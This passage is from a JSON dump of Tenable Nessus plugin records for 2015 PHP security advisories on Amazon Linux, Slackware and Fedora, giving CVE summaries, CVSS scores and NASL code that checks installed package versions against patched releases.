script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php54-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-bcmath-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-cli-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-common-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-dba-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-debuginfo-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-devel-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-embedded-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-enchant-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-fpm-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-gd-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-imap-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-intl-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-ldap-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mbstring-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mcrypt-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mssql-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysql-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysqlnd-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-odbc-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pdo-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pgsql-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-process-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pspell-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-recode-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-snmp-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-soap-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-tidy-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xml-5.4.41-1.69.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xmlrpc-5.4.41-1.69.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php54 / php54-bcmath / php54-cli / php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:47", "references": ["http://www.nessus.org/u?cd9704a8"], "pluginID": "84127", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to fix security issues.", "edition": 4, "reporter": "Tenable", "published": "2015-06-12T00:00:00", "title": "Slackware 14.0 / 14.1 / current : php (SSA:2015-162-02)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2015-06-15T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2015-162-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84127", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-162-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84127);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2015/06/15 14:00:50 $\");\n\n script_cve_id(\"CVE-2006-7243\", \"CVE-2015-2325\", \"CVE-2015-2326\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_bugtraq_id(44951, 74700, 74902, 74903, 74904, 75056);\n script_xref(name:\"SSA\", value:\"2015-162-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : php (SSA:2015-162-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.414774\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd9704a8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.4.41\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.4.41\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", pkgver:\"5.4.41\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.4.41\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.6.9\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.9\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:19", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "pluginID": "83975", "description": "An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026)\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325)\n\nPCRE library is prone to a vulnerability which leads to Heap overflow.\nWithout enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application.\n(CVE-2015-2326)", "edition": 5, "reporter": "Tenable", "published": "2015-06-04T00:00:00", "title": "Amazon Linux AMI : php56 (ALAS-2015-536)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php56-embedded", "p-cpe:/a:amazon:linux:php56-devel", "p-cpe:/a:amazon:linux:php56-opcache", "p-cpe:/a:amazon:linux:php56-debuginfo", "p-cpe:/a:amazon:linux:php56-gmp", "p-cpe:/a:amazon:linux:php56-ldap", "p-cpe:/a:amazon:linux:php56-dbg", "p-cpe:/a:amazon:linux:php56-xml", "p-cpe:/a:amazon:linux:php56-tidy", "p-cpe:/a:amazon:linux:php56-cli", "p-cpe:/a:amazon:linux:php56-fpm", "p-cpe:/a:amazon:linux:php56-bcmath", "p-cpe:/a:amazon:linux:php56-snmp", "p-cpe:/a:amazon:linux:php56-mcrypt", "p-cpe:/a:amazon:linux:php56", "p-cpe:/a:amazon:linux:php56-xmlrpc", "p-cpe:/a:amazon:linux:php56-mssql", "p-cpe:/a:amazon:linux:php56-process", "p-cpe:/a:amazon:linux:php56-imap", "p-cpe:/a:amazon:linux:php56-pspell", "p-cpe:/a:amazon:linux:php56-intl", "p-cpe:/a:amazon:linux:php56-soap", "p-cpe:/a:amazon:linux:php56-mbstring", "p-cpe:/a:amazon:linux:php56-enchant", "p-cpe:/a:amazon:linux:php56-common", "p-cpe:/a:amazon:linux:php56-pgsql", "p-cpe:/a:amazon:linux:php56-pdo", "p-cpe:/a:amazon:linux:php56-mysqlnd", "p-cpe:/a:amazon:linux:php56-gd", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:php56-recode", "p-cpe:/a:amazon:linux:php56-odbc", "p-cpe:/a:amazon:linux:php56-dba"], "id": "ALA_ALAS-2015-536.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83975", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-536.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83975);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-2325\", \"CVE-2015-2326\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_xref(name:\"ALAS\", value:\"2015-536\");\n\n script_name(english:\"Amazon Linux AMI : php56 (ALAS-2015-536)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer underflow flaw leading to out-of-bounds memory access was\nfound in the way PHP's Phar extension parsed Phar archives. A\nspecially crafted archive could cause PHP to crash or, possibly,\nexecute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was\nfound in the way PHP's FTP extension parsed file listing FTP server\nresponses. A malicious FTP server could use this flaw to cause a PHP\napplication to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount\nof CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4026)\n\nPCRE library is prone to a heap overflow vulnerability. Due to\ninsufficient bounds checking inside compile_branch(), the heap memory\ncould be overflowed via a crafted regular expression. Since PCRE\nlibrary is widely used, this vulnerability should affect many\napplications using it. An attacker may exploit this issue to execute\narbitrary code in the context of the user running the affected\napplication. (CVE-2015-2325)\n\nPCRE library is prone to a vulnerability which leads to Heap overflow.\nWithout enough bound checking inside pcre_compile2(), the heap memory\ncould be overflowed via a crafted regular expression. Since PCRE\nlibrary is widely used, this vulnerability should affect many\napplications. An attacker may exploit this issue to execute arbitrary\ncode in the context of the user running the affected application.\n(CVE-2015-2326)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-536.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php56' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php56-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-bcmath-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-cli-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-common-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dba-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dbg-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-debuginfo-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-devel-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-embedded-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-enchant-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-fpm-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gd-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gmp-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-imap-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-intl-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-ldap-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mbstring-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mcrypt-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mssql-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mysqlnd-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-odbc-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-opcache-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pdo-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pgsql-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-process-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pspell-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-recode-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-snmp-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-soap-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-tidy-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xml-5.6.9-1.112.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xmlrpc-5.6.9-1.112.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php56 / php56-bcmath / php56-cli / php56-common / php56-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:50", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1223425", "https://bugzilla.redhat.com/show_bug.cgi?id=1223408", "http://www.nessus.org/u?fe99a38e", "https://bugzilla.redhat.com/show_bug.cgi?id=1223412", "https://bugzilla.redhat.com/show_bug.cgi?id=1222485", "https://bugzilla.redhat.com/show_bug.cgi?id=1223422"], "pluginID": "83835", "description": "14 May 2015, **PHP 5.6.9**\n\nCore :\n\n - Fixed bug #69467 (Wrong checked for the interface by using Trait). (Laruence)\n\n - Fixed bug #69420 (Invalid read in zend_std_get_method). (Laruence)\n\n - Fixed bug #60022 ('use statement [...] has no effect' depends on leading backslash). (Nikita)\n\n - Fixed bug #67314 (Segmentation fault in gc_remove_zval_from_buffer). (Dmitry)\n\n - Fixed bug #68652 (segmentation fault in destructor).\n (Dmitry)\n\n - Fixed bug #69419 (Returning compatible sub generator produces a warning). (Nikita)\n\n - Fixed bug #69472 (php_sys_readlink ignores misc errors from GetFinalPathNameByHandleA). (Jan Starke)\n\n - Fixed bug #69364 (PHP Multipart/form-data remote dos Vulnerability). (Stas)\n\n - Fixed bug #69403 (str_repeat() sign mismatch based memory corruption). (Stas)\n\n - Fixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+). (Stas)\n\n - Fixed bug #69522 (heap buffer overflow in unpack()).\n (Stas)\n\nFTP :\n\n - Fixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow). (Stas)\n\nODBC :\n\n - Fixed bug #69354 (Incorrect use of SQLColAttributes with ODBC 3.0). (Anatol)\n\n - Fixed bug #69474 (ODBC: Query with same field name from two tables returns incorrect result). (Anatol)\n\n - Fixed bug #69381 (out of memory with sage odbc driver). (Frederic Marchall, Anatol Belski)\n\nOpenSSL :\n\n - Fixed bug #69402 (Reading empty SSL stream hangs until timeout). (Daniel Lowrey)\n\nPCNTL :\n\n - Fixed bug #68598 (pcntl_exec() should not allow null char). (Stas)\n\nPCRE :\n\n - Upgraded pcrelib to 8.37.\n\nPhar :\n\n - Fixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry filename starts with null). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2015-05-27T00:00:00", "title": "Fedora 22 : php-5.6.9-1.fc22 (2015-8281)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-10-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-8281.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83835", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-8281.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83835);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:14:53 $\");\n\n script_cve_id(\"CVE-2006-7243\", 